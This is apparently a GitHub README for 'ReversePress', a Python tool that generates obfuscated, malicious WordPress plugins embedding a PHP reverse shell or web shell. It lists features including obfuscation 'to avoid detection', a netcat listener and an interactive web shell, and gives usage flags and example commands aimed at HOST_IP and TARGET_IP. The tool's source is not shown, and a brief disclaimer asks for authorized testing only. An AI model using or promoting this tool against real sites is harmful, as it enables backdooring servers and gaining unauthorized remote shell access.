
Malicious Wordpress plugin generator that provides a reverse shell once installed on the target application.

Primary LanguagePythonMIT LicenseMIT


ReversePress is a Python-based tool designed for generating malicious WordPress plugins. It takes a PHP reverse shell and embeds it into a custom, obfuscated WordPress plugin. The plugin is then compressed into a zip archive ready for deployment. The tool also provides the ability to listen for incoming connections after the plugin has been deployed.


  • Embeds a PHP reverse shell into a custom WordPress plugin
  • Supports of custom PHP reverse shells
  • Obfuscates the plugin code to avoid detection
  • Compresses the plugin into a zip archive ready for deployment
  • Provides the ability to listen for incoming connections after the plugin has been deployed
  • Provides the ability to start an interactive web shell session on the target


usage: reversePress.py [-h] [-i INPUT] [-l] [-o OUTPUT] [-p PORT] host

positional arguments:
  host                          host to connect back to

  -h, --help                    show this help message and exit
  -i INPUT, --input INPUT       custom PHP reverse shell file to add to the plugin
  -l, --listener                start a netcat listener after generating the plugin
  -o OUTPUT, --output OUTPUT    name of the file to be generated
  -p PORT, --port PORT          port to listen on
  -w, --webshell                use a PHP web shell
  -x TARGET, --xinteractive TARGET
                                start a interactive web shell on the target

Getting Started

  1. Clone the repository: git clone https://github.com/MachadoOtto/reversePress.git
  2. Install Python 3 if not already installed.
  3. If using the Netcat listener, ensure that Netcat is installed and available in the system path.
  4. Run reversePress.py with the desired arguments.


  1. Basic usage with default port:

    python reversePress.py HOST_IP
  2. Use a custom PHP reverse shell:

    python reversePress.py HOST_IP -i /path/to/reverse_shell.php
  3. Custom port and start a Netcat listener:

    python reversePress.py HOST_IP -p 1234 -l
  4. Use a PHP web shell and start the Interactive Web Shell session on the target:

    python reversePress.py HOST_IP -w -x http://TARGET_IP


This project is licensed under the MIT License. See the LICENSE file for details.


This script is provided as-is, without any warranties or guarantees. Use this tool responsibly and only on systems and applications you are authorized to test. If you use it for evil you should feel bad :(

  • The Monada 🙈🙉🙊